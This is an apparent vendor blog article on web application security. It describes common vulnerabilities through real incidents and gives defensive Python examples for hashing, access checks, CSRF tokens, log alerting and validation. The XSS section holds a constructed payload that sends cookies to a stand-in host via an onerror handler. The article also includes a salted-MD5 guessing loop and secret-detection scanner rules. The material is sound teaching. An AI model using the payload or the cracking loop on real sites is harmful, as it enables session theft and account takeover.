Web Application Security: Best Practices to stop Threats

Read on to find out which common web app vulnerabilities are compromising web apps globally, and the best practices that strengthen web app security.

April 17, 2022
10 mins read
Last Updated January 13, 2023


Web applications have been on the rise on the back of improving internet speeds and higher internet penetration. They offer engaging digital experiences without the need to download heavy applications.

Businesses are scrambling to cash in on web apps as they become the preferred touchpoints of users. However, apart from customers and companies, web applications appeal to one more faction— cybercriminals.

Basic web application attacks are now the second most common pattern seen in hacking attempts and breaches, which makes web application security a serious concern. Most new web businesses lack the infrastructure needed to mitigate sophisticated attacks, so they are easy prey.

Rise of web application attacks

The coronavirus pandemic also contributed to the increase in web application attacks. With substantial restrictions imposed on physical operations, many businesses decided to improve their online presence and rolled out web applications. Cybercrime followed soon after.

There was a massive 800% increase in web application attacks in the first half of 2020. As a web app owner, you should be concerned since these attacks were distributed across all industries.


You need to be aware of the consequences, methods, and prevention of web app attacks for successful web application development. This article will equip you with all of the relevant knowledge. But before we get into any of that, let’s start with developing a better understanding of web application security.

Simform is a leading web application development company with a demonstrated history of multiple successful web apps under its belt. Contact us to get access to top-notch web development expertise and seasoned developers for your next project.

What is Web Application Security?

Web application security, more commonly known as Web AppSec, is the use of tools, strategies, and best practices to keep web apps working correctly while under attack. It also covers preventing the loss of data and other valuable information during attempted breaches.

Unfortunately, web app source code is usually complex, which makes it easy for vulnerabilities to go unnoticed. And with the volume and reach of attacks on web apps going up, it's only a matter of time before threat actors find and exploit such vulnerabilities.

So What are the Consequences of Ignoring Web Application Security?

Recent web development surveys suggest that 9 out of 10 web application users are susceptible to cyber attacks. Despite such an alarming rate, companies often don't pay enough attention to securing their web applications. For example, the Mossack Fonseca (MF) breach, popularly known as the Panama Papers, happened because the law firm ran its website and client portal on outdated, unpatched software. While we don't promote securing web applications for the sake of hiding illicit activities, the dreadful consequences could easily have been avoided.

Based on the kind of attack, the aftermath of a web application attack can be devastating for your business. Here are the possible outcomes of a cyber attack.

Loss of sensitive information

Gone are the days when the only idea of a cyber attack was a transfer of funds to random offshore accounts. Cybercriminals now realize that data is far more valuable. Sadly, some web app owners unknowingly make it easier for them to breach databases.

In 2020 alone, data breaches affected more than 155.8 million individuals. And that isn’t reassuring! Web applications often deal with sensitive user information. From email addresses to credit card numbers and passwords, attackers try to get their hands on any leverageable data.

VerticalScope lost more than 45 million records from its network of more than 1,100 websites and forums. The records contained user IDs, email addresses, IP addresses, hashed passwords, and more. The majority of these passwords were hashed with salted MD5, a fast hash that offers little resistance to offline cracking: the salt defeats precomputed tables, but a GPU can still test billions of guesses per second. Storing them with a deliberately slow password-hashing function such as bcrypt, scrypt, or Argon2 would have vastly reduced the impact of this breach.
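To make the difference concrete, here is an added example (not VerticalScope's or Simform's code) that contrasts the salted-MD5 scheme above with a slow, salted key-derivation function from the Python standard library. The wordlist, salt and iteration count are constructed for the demonstration; the 600,000-iteration figure follows OWASP's current recommendation for PBKDF2-HMAC-SHA256.

```python
import hashlib
import hmac
import os
from typing import Iterable, Optional

# Example code added for this article; not VerticalScope's or Simform's code.
# Iteration count per OWASP Password Storage Cheat Sheet (PBKDF2-HMAC-SHA256).
PBKDF2_ITERATIONS = 600_000


def md5_salted(password: str, salt: bytes) -> bytes:
    """The weak scheme from the breach: a single MD5 pass over salt+password."""
    return hashlib.md5(salt + password.encode()).digest()


def crack_salted_md5(target: bytes, salt: bytes, wordlist: Iterable[str]) -> Optional[str]:
    """Salt stops rainbow tables but not a per-user guess loop. MD5 is so fast
    that this loop runs billions of times per second on commodity GPUs."""
    for guess in wordlist:
        if md5_salted(guess, salt) == target:
            return guess
    return None


def hash_password(password: str) -> str:
    """Store as 'pbkdf2_sha256$iterations$salt_hex$hash_hex' so the parameters
    travel with the hash and can be raised later without a flag day."""
    salt = os.urandom(16)  # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored parameters; compare in constant time."""
    try:
        algo, iters, salt_hex, hash_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(dk, bytes.fromhex(hash_hex))
    except ValueError:  # malformed record: treat as a failed login, never raise
        return False
```

A few hundred thousand iterations cost a legitimate login a fraction of a second, but multiply an attacker's per-guess cost by the same factor; bcrypt, scrypt or Argon2id are better still because they also consume memory.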

Downtime and loss of revenue

While data is invaluable, time is of the essence. For companies relying on web applications for day-to-day operations, any downtime can incur heavy losses. For example, an hour of downtime costs $84,650 on average. That’s a massive number for any small or medium-sized business.

DDoS attacks are among the most commonly used to overwhelm a web application’s servers and force it into downtime. During this period, users won’t be able to access your services, and given the fragile patience of modern consumers, you can lose some valuable customers forever.

Loss of reputation

No one wants to engage with a business that isn't serious about its web app security. A lot of companies get away with half-hearted security measures for their web applications, but the unfortunate ones who fall prey to attacks find it difficult to save face. News of a cyber attack often finds its way into the mainstream media, and the company's reputation goes for a toss. The aftermath can be a significant drop in share value and customers abandoning your business.

High cost of acting late

Once a company undergoes a web application attack, it needs to scramble to prevent any more attacks or losses. The first thing they need to do is to fix the vulnerability. And fixing vulnerabilities can be an expensive affair. You might have to rewrite huge parts of code again or get back to the drawing board to build a secure infrastructure for the web app. Then there are other expenses such as lawsuits from stakeholders. A report suggests that the average cost of a cyber attack is $1.1 million. And it’s easily fathomable given how destructive web application attacks can be.

Being penalized by regulators

The law requires companies to adhere to specific safety and security standards. If a breach is found to have occurred because those measures were absent, the company can be heavily fined, and in some cases individuals face imprisonment.

Some of the laws regulating cybersecurity in the USA are HIPAA (1996), GLBA (1999), FISMA (2002), and CISA (2015). HIPAA penalties can reach $50,000 per violation, and GLBA violations can carry fines of up to $100,000 each.


Staying proactive is simply the best way to save yourself from such consequences of a web application attack. And to be able to do that, you need to be aware of the major threats to your web application. So let’s learn about some of them.

Common Web App Security Vulnerabilities With Real-world Examples

Here are the common web app security vulnerabilities that you should keep an eye out for.

Broken access control

Access control refers to the regulation of permissions so that users cannot access more than what they need. However, developers often leave some loopholes unattended, which can lead to unwarranted access to users. Bad actors often utilize broken access control to access sensitive information, modify data, delete data, or even perform restricted business functions.

Laxman Muthiyah discovered one such vulnerability in Facebook business pages. While Facebook allows third-party apps to post photos and statuses on a user's behalf, they are not supposed to be able to view or modify the admin roles on a page. That restriction keeps the user in complete control of their page at all times.

However, Laxman discovered that he could add anyone as a page admin with a single crafted request, and then modify or delete the page's information. The new admin could post on the page's behalf while the real admin was locked out. Facebook rewarded Laxman $2,500 under its bug bounty program, but the cost could have been far higher had a bad actor found the flaw first.

Security misconfiguration

Security misconfiguration is the failure to apply all the security settings needed to safeguard the web application, or applying them incorrectly so that gaps remain.

A security misconfiguration can sabotage your web application in multiple ways and at different layers. For example, attackers can gain a foothold through network services, web servers, databases, frameworks, custom code, cloud storage, host operating systems, and so on.

Interestingly, multiple organizations over the years have failed to secure their Amazon S3 storage and subsequently paid the price. Australian Broadcasting Corporation (ABC) is one such organization. 1800 daily MySQL database backups containing all sorts of information such as email addresses, logins, hashed passwords, license requests, secret access keys, etc., were discovered online.

When ABC was informed about the exposure, it addressed the misconfiguration almost immediately. However, the damage was done: two years' worth of sensitive data had been open to anyone who found the bucket.
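The ABC exposure is the classic "bucket policy that grants everyone read" mistake. The following added example (not ABC's or Simform's code) is a small audit check that parses an S3 bucket policy document and flags Allow statements giving read or list access to an anonymous principal. The sample policy is constructed for the demonstration; the bucket name and account ID in it are placeholders.

```python
import json

# Example code added for this article. Constructed sample policy (placeholder
# bucket and account): the first statement is fine, the second opens the
# backups to the whole internet.
SAMPLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "BackupWriter", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::123456789012:role/backup-writer"},
         "Action": ["s3:PutObject"],
         "Resource": "arn:aws:s3:::db-backups/*"},
        {"Sid": "Oops", "Effect": "Allow", "Principal": "*",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::db-backups", "arn:aws:s3:::db-backups/*"]},
    ],
})

# Actions that let a principal read or enumerate data (lower-cased for matching).
READ_ACTIONS = {"s3:getobject", "s3:listbucket", "s3:get*", "s3:*", "*"}


def _as_list(value):
    """IAM policy fields may be a single string or a list; normalise to a list."""
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal) -> bool:
    """AWS treats Principal "*" and {"AWS": "*"} as 'anyone, including unauthenticated'."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS", []))
    return False


def public_read_statements(policy_json: str) -> list:
    """Return (Sid, has_condition) for every Allow statement that grants a read
    or list action to an anonymous principal. A Condition may narrow the grant
    (e.g. aws:SourceVpc), so it is reported rather than silently trusted."""
    doc = json.loads(policy_json)
    findings = []
    for st in _as_list(doc.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _is_anonymous(st.get("Principal")):
            continue
        actions = {a.lower() for a in _as_list(st.get("Action", []))}
        if actions & READ_ACTIONS:
            findings.append((st.get("Sid", "<no Sid>"), "Condition" in st))
    return findings
```

Run this against `aws s3api get-bucket-policy` output for every bucket, and keep S3 Block Public Access enabled at the account level so that a policy like "Oops" is rejected at write time rather than discovered later.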

Sound development practices and testing could’ve avoided the issue altogether. For instance, Simform has created a performant and scalable web application for International Hockey Federation (FIH) which also utilizes Amazon S3 storage.

With expert development strategies, we’ve kept the application free of any cybersecurity risks and enabled our clients to deliver a dynamic and robust application to their audiences worldwide.

Cross-site scripting (XSS)

Cross-site scripting (XSS) occurs when an attacker injects a malicious script into a page that the website then serves to other users. The victim's browser cannot tell the injected script from the site's own code, so it runs with the site's origin and can read the session cookies, tokens, and page content available to that user.

An XSS flaw can appear anywhere the application takes input from a user and echoes it back into a page without validating and encoding it. Steam is a popular game distribution platform with more than 120 million registered users. The platform allows for buying games, interacting with other players, multiplayer gaming and much more.

In 2017, a cross-site scripting flaw was found on Steam profile pages that let anyone embed HTML and JavaScript in them. Given the popularity and nature of Steam, the flaw could have been used for phishing attacks, redirecting gamers to fake login pages and draining their accounts.
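The defence is context-aware output encoding, backed by a Content Security Policy for the cases where an encoding slip still lets markup through. The following added example (not Steam's code) renders a profile heading two ways: the vulnerable version interpolates the display name straight into HTML, the fixed one encodes for the HTML context and URL-encodes the value that lands in a link. The payload is a constructed attacker input and `evil.example` is a placeholder domain.

```python
import html
from urllib.parse import quote

# Example code added for this article; not Steam's code.
# Constructed attacker input, as it might be saved as a "display name".
PAYLOAD = '<img src=x onerror="fetch(\'https://evil.example/?c=\'+document.cookie)">'


def render_profile_vulnerable(display_name: str) -> str:
    """Reflects user data into HTML untouched: the <img onerror> executes."""
    return f"<h1>Profile of {display_name}</h1>"


def render_profile_safe(display_name: str, user_id: str) -> str:
    """Encoding is per context: html.escape for element text and attribute
    values (quote=True also escapes ' and "), urllib.parse.quote for a URL
    path segment. The same value needs different encoding in each place."""
    name = html.escape(display_name, quote=True)
    path_segment = quote(user_id, safe="")
    return f'<h1>Profile of {name}</h1><a href="/u/{path_segment}">permalink</a>'


def security_headers() -> dict:
    """Defence in depth. This CSP blocks inline scripts and inline event
    handlers (no 'unsafe-inline'), and only allows scripts from our own origin,
    so even a missed encoding cannot run the injected handler."""
    return {
        "Content-Security-Policy": (
            "default-src 'self'; script-src 'self'; object-src 'none'; "
            "base-uri 'self'; frame-ancestors 'none'"
        ),
        "X-Content-Type-Options": "nosniff",
    }


def contains_live_markup(rendered: str) -> bool:
    """Crude check for the demonstration: did the payload survive as a tag?"""
    return "<img" in rendered and "onerror" in rendered
```

Template engines such as Jinja2 (with autoescape on) or React's JSX do the HTML-context step for you; the URL, JavaScript and CSS contexts still need their own encoders, and the CSP header still has to be set by the server.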

Insecure direct object references

An insecure direct object reference (IDOR) is a vulnerability in which the application exposes a reference to an internal object, such as a database key or file name, and acts on it without checking that the requesting user is authorized to access that particular object.

One of the most famous real-life cases of this vulnerability was found at Yahoo!, where Egyptian security researcher Ibrahim Raafat unearthed a flaw that would have let him wipe out more than 1.5 million records from Yahoo's database.

Raafat looked at what happened when he deleted his own comment on the Yahoo Suggestion Board and soon discovered that by changing the identifiers in that request he could delete other users' comments as well. Given Yahoo's popularity at the time, that put him in a position to delete potentially millions of records. He reported the flaw to Yahoo and received a reward under their bug bounty program.
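Both the Facebook page-admin bug and the Yahoo comment-deletion bug are the same mistake: the server trusts the identifier in the request and never asks whether this user may act on that object. The following added example (not Facebook's or Yahoo's code) models both in an in-memory store, showing the vulnerable handler beside the one that checks the requester's relationship to the object first. All data is constructed.

```python
# Example code added for this article; not Facebook's or Yahoo's code.


class Forbidden(Exception):
    """Raised when the requester may not act on the object (or it doesn't exist)."""


def fresh_store() -> dict:
    """Constructed data: two comments by two users, one page with one admin."""
    return {
        "comments": {101: {"author": "alice", "text": "hi"},
                     102: {"author": "bob", "text": "yo"}},
        "page_admins": {"acme-page": {"carol"}},
    }


def delete_comment_vulnerable(store: dict, requester: str, comment_id: int) -> None:
    # IDOR: being logged in is the only check, so any user can delete any
    # comment just by changing the numeric ID in the request.
    store["comments"].pop(comment_id, None)


def delete_comment(store: dict, requester: str, comment_id: int) -> None:
    comment = store["comments"].get(comment_id)
    # "Missing" and "not yours" produce the same response, so IDs cannot be
    # enumerated by watching which ones return 404 versus 403.
    if comment is None or comment["author"] != requester:
        raise Forbidden("comment not found or not yours")
    del store["comments"][comment_id]


def add_page_admin_vulnerable(store: dict, requester: str, page: str, new_admin: str) -> None:
    # Broken access control: the endpoint never asks whether the requester
    # already administers this page (or is merely a third-party app token).
    store["page_admins"].setdefault(page, set()).add(new_admin)


def add_page_admin(store: dict, requester: str, page: str, new_admin: str) -> None:
    if requester not in store["page_admins"].get(page, set()):
        raise Forbidden("only a current admin may add admins")
    store["page_admins"][page].add(new_admin)
```

The check belongs in the data-access layer (or a single authorization helper every handler calls), not sprinkled into individual endpoints, so that a new route cannot forget it; OWASP's alternative of per-session indirect references hides the real IDs but is no substitute for the ownership check.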

Cross-site request forgery

Cross-site request forgery (CSRF) is a vulnerability in which an attacker's page makes a victim's browser send a request to a site where the victim is already logged in. Because the browser attaches the session cookie automatically, the site treats the forged request as the user's own; social engineering is usually what gets the victim onto the attacker's page. The consequences include, but are not limited to, account takeovers, fund transfers, and in some cases takeover of the entire web application.

TikTok is a wildly popular video-sharing app home to more than a whopping 689 million users. Because of its raging popularity, TikTok drives a lot of revenue for successful content creators on the platform. It has also attracted a ton of businesses to advertise themselves on the platform and have millions of eyeballs on them.

However, in 2020 a researcher found that a reflected cross-site scripting flaw in a TikTok URL parameter could be chained with an endpoint that lacked CSRF protection: a JavaScript payload injected through the parameter allowed a one-click takeover of any TikTok account.
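The standard defence is a per-session anti-CSRF token that a cross-site page cannot read, plus `SameSite` cookies and a refusal to change state on GET. The following added example (not TikTok's code) implements the stateless synchronizer-token variant for a constructed "change email" endpoint. `SERVER_SECRET` is generated at import time here as a placeholder; a real deployment loads it from a secret store, and the `request` dict shape is an assumption made for the demonstration.

```python
import hashlib
import hmac
import secrets

# Example code added for this article; not TikTok's code.
# Placeholder: in practice load this from a secret store, not generate it at startup.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token_for(session_id: str) -> str:
    """token = HMAC(secret, session_id). The attacker's page cannot read the
    victim's cookie or DOM, so it cannot learn or forge this value."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_token_valid(session_id: str, submitted) -> bool:
    return hmac.compare_digest(csrf_token_for(session_id), submitted or "")


def session_cookie(session_id: str) -> str:
    """SameSite=Lax stops the browser attaching this cookie to cross-site POSTs
    at all; HttpOnly keeps scripts from reading it; Secure keeps it off HTTP."""
    return f"session={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def handle_change_email(request: dict, session_id: str) -> str:
    """request is a constructed dict: {'method', 'form', 'headers'}."""
    if request["method"] != "POST":
        return "405 state changes must use POST"      # never mutate on GET
    if not csrf_token_valid(session_id, request["form"].get("csrf_token")):
        return "403 CSRF check failed"
    # Fetch Metadata: modern browsers say where the request came from. Absent
    # header (older browsers) is allowed through; the token check already ran.
    site = request["headers"].get("Sec-Fetch-Site", "same-origin")
    if site not in ("same-origin", "none"):
        return "403 cross-site request"
    return f"200 email changed to {request['form']['email']}"
```

Embed `csrf_token_for(session_id)` as a hidden field in every state-changing form (or send it in a custom header from your own JavaScript); rotating the session ID on login rotates the token with it.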

These vulnerabilities merely scratch the surface regarding possible web application security vulnerabilities, and you can’t go hunting each one of them. Instead, it would be best if you focused on web application security best practices to stay out of harm’s way. 

Best Practices for Web Application Security Solutions

Following the best practices below will help you address many of the security challenges in web development. Let's look at the strategies your development team can implement.

1. Implement shift left security in SDLC

In today's era of software development, teams tend to prefer agile methodologies, and so make heavy use of the cloud, DevOps, containers, microservices, etc. Unfortunately, these approaches introduce many distributed components into your IT ecosystem, and you need to manage the threats and vulnerabilities that come with them.

That is where shift-left security comes in. It is the practice of moving security checks as early in the SDLC (Software Development Life Cycle) as possible, and running them often, as part of DevSecOps. This approach has numerous benefits, such as lower remediation cost, early problem identification, faster deployment and delivery, and an improved security posture.

Shift-left security comprises activities such as:

  • Using threat modeling
  • Incorporating security considerations into design and development
  • Testing code to identify security loopholes and rectify them before the final release

Five of the most widely used categories of shift-left security tooling are:

  • Static Application Security Testing (SAST): Analyzes source code (or bytecode) without running it. It helps you identify weaknesses that may lead to security vulnerabilities, such as injection sinks and hardcoded secrets.
  • Dynamic Application Security Testing (DAST): Black-box testing of the running application. It detects issues in requests, responses, interfaces, scripts, injections, authentication, and session handling.
  • Software Composition Analysis (SCA): Also known as origin analysis; it inventories the third-party components and libraries you depend on, matches them against known vulnerabilities, and notifies you when patches or updates are available.
  • Interactive Application Security Testing (IAST): Instruments the running application from inside (an agent in the runtime), so that dynamic tests are correlated with the exact code paths they exercise, combining the strengths of SAST and DAST.
  • Application Security Testing as a Service (ASTaaS): The organization outsources the security testing of its application. It typically combines penetration testing and API testing to get an accurate picture of security loopholes.

2. Incorporate auditing and logging

Security logging and monitoring failures form their own category in the OWASP Top 10 (A09:2021), so this is a weakness you must address. Concrete data on how often missing logs contribute to breaches is scarce, but as a CISO (Chief Information Security Officer) you won't take the chance of neglecting even a small share of security concerns.

Auditing and logging involve:

  • Tracing logins and essential transactions
  • Monitoring logs for unusual activity
  • Creating an automatic alert on abnormal sequences

Proper logging records what happened, when, and how it occurred, which is what lets you establish root cause. That analysis in turn tells you which threats your products or applications actually face. For logging and auditing, you can rely on Linux syslog, the ELK stack, Papertrail, etc. Logging lets you get into the thick of things in case of a breach, and it gives you a reference point that makes threat identification and modeling far easier.
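"Creating an automatic alert on abnormal sequences" is the step most teams never get to. The following added example (not Simform's code or any vendor's product) runs a small detector over constructed authentication log lines: it raises an alert when one source IP accumulates five failed logins inside a two-minute window, and a second, higher-priority alert if a successful login from that IP follows such a burst. The log format, threshold and window are assumptions for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Example code added for this article. Constructed auth log lines (documentation
# IP ranges, fictional users); not from any real system.
SAMPLE_LOG = """\
2023-01-13T10:00:01Z auth ip=203.0.113.5 user=alice result=FAIL
2023-01-13T10:00:03Z auth ip=203.0.113.5 user=alice result=FAIL
2023-01-13T10:00:04Z auth ip=203.0.113.5 user=bob result=FAIL
2023-01-13T10:00:06Z auth ip=203.0.113.5 user=carol result=FAIL
2023-01-13T10:00:07Z auth ip=203.0.113.5 user=dave result=FAIL
2023-01-13T10:00:09Z auth ip=203.0.113.5 user=dave result=OK
2023-01-13T10:05:00Z auth ip=198.51.100.7 user=erin result=FAIL
2023-01-13T10:30:00Z auth ip=198.51.100.7 user=erin result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>\S+)$")
FAILS_THRESHOLD = 5              # assumed tuning values
WINDOW = timedelta(minutes=2)


def parse(line: str):
    """Return a dict for a well-formed line, None otherwise."""
    m = LINE_RE.match(line)
    if not m:
        return None  # unparsable lines deserve their own counter/alert in production
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect(log_text: str) -> list:
    """Sliding-window brute-force detection per source IP."""
    recent_fails = defaultdict(deque)   # ip -> timestamps of failures inside WINDOW
    alerts = []
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        q = recent_fails[ev["ip"]]
        while q and ev["ts"] - q[0] > WINDOW:   # expire old failures
            q.popleft()
        if ev["result"] == "FAIL":
            q.append(ev["ts"])
            if len(q) == FAILS_THRESHOLD:      # fire once when the threshold is crossed
                alerts.append(("brute_force", ev["ip"], ev["ts"].isoformat()))
        elif ev["result"] == "OK" and len(q) >= FAILS_THRESHOLD:
            # A success right after a burst of failures is the one to wake someone for.
            alerts.append(("success_after_burst", ev["ip"], ev["user"]))
    return alerts
```

The same shape (parse, keep per-key state with a time window, emit on a rule) is what a SIEM correlation rule does; the value of writing one by hand is knowing exactly which log fields your application has to emit for the rule to be possible.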

3. Avoid security misconfiguration

Modern web servers provide plenty of configuration options for robust management. However, those options also create room for confusion, and that sometimes leads to security misconfigurations.

Here are some of the things that lead to security breaches:

  • Having unnecessary open ports on the web server
  • Not protecting the files or directories
  • Using outdated security protocols
  • Allowing digital certificates to expire
  • Not removing default, temporary, or guest accounts
  • Using old or obsolete software libraries

To avoid such mishaps, you should have a well-documented server management process, ideally expressed as code (configuration management or infrastructure-as-code) so that every server is built the same way. Everyone handling server management should strictly follow the steps in that document. Today's web servers allow granular control over resources and security, but every option you cannot account for is a potential entry point for attackers. So be extremely careful while configuring your web servers and take appropriate security measures.

4. Conduct a full-scale security audit

Every day, the security community registers new threats and vulnerabilities. Therefore, a regular security audit is the only way to ensure comprehensive security for your organization.

For objectivity, it is advisable to appoint a third-party testing team to conduct this audit. A third-party team brings experience across many organizations and attack techniques, and can give you a holistic picture of your security posture.

There are three types of security audits that you can conduct:

  • Black Box Security Audit: It’s also called a ‘hacker style’ audit, where you only provide the URL of your website and ask the audit team to find security vulnerabilities.
  • White Box Security Audit: Here, you provide essential information, including your source code about your website, to the audit team. The purpose is to check whether you’ve followed the security best practices in coding, server management, cloud, etc.
  • Gray Box Security Audit: It’s a mix of black and white box audits where you provide some information about the website to the auditing team, but not all.

After choosing any of these approaches, the next step is to fix the vulnerabilities found. Prioritize them by their impact on your application and by how likely they are to be exploited, and start with the ones that score highest on both.

5. Ensure data encryption

When someone visits a web application, they might share confidential information that you need to protect from attackers. That is what data encryption is for. You should encrypt data in transit between the visitor's browser and your server; TLS (the successor to SSL) does this for all communication over HTTPS.

Encryption in transit also builds trust with your visitors, and it helps SEO, since Google favors sites served over HTTPS with a valid TLS certificate. Data stored in the database or on the server (data at rest) needs encryption as well.

Here are a few best practices for data encryption:

  • Encrypting sensitive data with a current, well-reviewed algorithm (for example AES-GCM for data at rest, TLS 1.2 or later in transit) and managing the keys separately from the data
  • Investing in infrastructure-level security
  • Implementing network firewalls
  • Storing data in a database server that requires authentication and is not reachable from the internet

6. Security testing within CI/CD pipeline

Nowadays, developers rely on modern development philosophies like DevOps to ensure quick and robust delivery of products. To bring DevOps into your software development life cycle, you use CI/CD pipelines. If those pipelines don't run security checks, vulnerabilities flow straight into your application.

Therefore, implement security testing within CI/CD pipelines to detect problems as the code is built. It saves a lot of time, money, and resources, and you can catch and fix security issues before the product goes live in the production environment. Security automation tools such as SonarQube, Fortify WebInspect, and AWS's security services can help you.
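The shift-left section above and this one both come down to the same mechanism: a check that runs on every commit and fails the build. The following added example (not Simform's code and not a stand-in for SonarQube or any vendor's scanner) is a deliberately small SAST-style step: it scans source files for a handful of high-signal patterns (a hardcoded AWS access key ID, `eval`, `shell=True`, MD5 over a password, a pasted private key) and exits non-zero so the pipeline stage fails. The rules and the sample source file are constructed for the demonstration; the key in it is AWS's documented example key.

```python
import re
import sys
from pathlib import Path

# Example code added for this article; a minimal stand-in for a SAST/secret-
# scanning CI step, not any vendor's tool. Rules are constructed examples.
RULES = [
    ("hardcoded-aws-key", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("python-eval", re.compile(r"\beval\(")),
    ("shell-true", re.compile(r"subprocess\.\w+\(.*shell\s*=\s*True")),
    ("md5-for-passwords", re.compile(r"hashlib\.md5\(.*(pass|pwd)", re.IGNORECASE)),
    ("private-key-block", re.compile(r"-----BEGIN (RSA |EC )?PRIVATE KEY-----")),
]


def scan_text(text: str, name: str = "<inline>") -> list:
    """Return (file, line number, rule id) for every match. A '# nosec' marker
    on the line is an explicit, code-reviewable suppression."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if "# nosec" in line:
            continue
        for rule_id, rx in RULES:
            if rx.search(line):
                findings.append((name, lineno, rule_id))
    return findings


def scan_paths(paths) -> list:
    """Recursively scan every .py file under the given directories."""
    findings = []
    for p in paths:
        for f in sorted(Path(p).rglob("*.py")):
            findings.extend(scan_text(f.read_text(errors="replace"), str(f)))
    return findings


# Constructed sample "source file" for the demonstration (AWS's documented example key).
SAMPLE_SOURCE = """\
import hashlib, subprocess
AWS_KEY = "AKIAIOSFODNN7EXAMPLE"
def login(pwd):
    return hashlib.md5(pwd.encode()).hexdigest()
def run(cmd):
    return subprocess.run(cmd, shell=True)
total = eval(user_input)  # nosec
"""

if __name__ == "__main__":
    hits = scan_paths(sys.argv[1:] or ["."])
    for name, lineno, rule_id in hits:
        print(f"{name}:{lineno}: {rule_id}")
    sys.exit(1 if hits else 0)   # non-zero exit blocks the CI stage
```

Wire it in as a pipeline step such as `python scan.py src/` before the test stage; real tools (Semgrep, Bandit, gitleaks, the commercial scanners named above) use the same fail-the-build contract with far richer rule sets.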

7. Implement real-time security monitoring

While security audits help you find vulnerabilities at a point in time, you also need something that protects the application 24*7. Real-time security monitoring does that, and a Web Application Firewall (WAF) is its most common implementation.

A WAF sits in front of the application and inspects traffic, blocking known-bad patterns such as SQL injection, XSS payloads, or bad bots attempting DDoS. However, a WAF matches patterns rather than understanding your application, so it produces false positives and can be bypassed with encoding tricks; treat it as one layer, not the fix.

An Application Security Management Platform (ASMP) or a Runtime Application Self-Protection (RASP) tool adds a second layer. RASP runs inside the application's own runtime, where it can see the actual database query or file path being built, and blocks the request or session when it detects an attack; because it has that context, it catches more and misfires less than a pattern-matching WAF. An ASMP typically combines this runtime protection with monitoring of the surrounding protocols and services (FTP, ICMP, SOAP, TCP, etc.) in one console.

8. Validate all the inputs

Any interactive web application receives a great deal of input from users in requests. As a CSO (Chief Security Officer), you should treat all input as hostile until proven otherwise. Put input validation in place at every trust boundary so that the data the site receives cannot carry an attack or corrupt data into your ecosystem and trigger malfunctions of any component.

Common kinds of input validation are:

  • Data value validation: Ensure parameters fall within the expected ranges (and, for strings, match an allowlist pattern).
  • Data format validation: Ensure the request body follows the expected JSON or XML schema, and reject fields you did not ask for.
  • Data type validation: Ensure parameters are of the correct type: numeric, text, date, etc.

Validation has two layers: syntactic and semantic. Syntactic validation enforces the correct form of a value (an SSN, a birth date, a currency amount, a whole number). Semantic validation enforces correctness within the business context (the end date is after the start date, the low price is less than the high price). Run syntactic checks first; semantic rules only make sense over well-formed values.
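The following added example (not Simform's code) validates a constructed "price alert" request in exactly that order: allowlisted field names, type checks, then syntactic format and range checks, and only then the semantic business rules. The schema and limits are assumptions made for the demonstration.

```python
import re
from datetime import date

# Example code added for this article. Constructed schema for a "price alert"
# request: which fields may appear and what Python type each must be.
SYMBOL_RE = re.compile(r"^[A-Z]{1,5}$")              # allowlist, not a denylist
SCHEMA = {"symbol": str, "low": (int, float), "high": (int, float),
          "start": str, "end": str}
MAX_PRICE = 1_000_000                                  # assumed business limit


def validate_alert(payload) -> list:
    """Return a list of error strings; an empty list means the payload is acceptable."""
    if not isinstance(payload, dict):
        return ["payload must be a JSON object"]
    errors = []

    # 1. Shape and type: unknown fields are rejected, not silently ignored
    #    (mass-assignment bugs start with "we just ignore extras").
    unknown = set(payload) - set(SCHEMA)
    if unknown:
        errors.append(f"unexpected fields: {sorted(unknown)}")
    for field, typ in SCHEMA.items():
        if field not in payload:
            errors.append(f"{field}: missing")
        elif isinstance(payload[field], bool) or not isinstance(payload[field], typ):
            errors.append(f"{field}: wrong type")   # bool subclasses int; reject it
    if errors:
        return errors

    # 2. Syntactic: format and range of each value on its own.
    if not SYMBOL_RE.match(payload["symbol"]):
        errors.append("symbol: must be 1-5 uppercase letters")
    for f in ("low", "high"):
        if not (0 < payload[f] <= MAX_PRICE):
            errors.append(f"{f}: out of range")
    dates = {}
    for f in ("start", "end"):
        try:
            dates[f] = date.fromisoformat(payload[f])   # strict YYYY-MM-DD
        except ValueError:
            errors.append(f"{f}: expected YYYY-MM-DD")
    if errors:
        return errors

    # 3. Semantic: business rules over values that are already well-formed.
    if payload["low"] >= payload["high"]:
        errors.append("low must be less than high")
    if dates["end"] <= dates["start"]:
        errors.append("end must be after start")
    return errors
```

Returning every error at once (rather than the first) is friendlier to legitimate clients and costs nothing in security, because nothing downstream runs until the list is empty.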

9. Use exception management

You should never display raw, system-generated error messages to users. They add no value for end users, and they hand attackers details (stack traces, file paths, SQL fragments, library versions) that point straight at a specific weakness. Exception handling is what decides how the application responds when an operation fails and has to be rejected.

With proper exception handling, the application fails safely: the full detail goes to the server log for your own investigation, while the user sees only a generic message. That removes a source of reconnaissance for attackers. For example, a failed withdrawal at an ATM shows a friendly "please retry later" message rather than the underlying error.
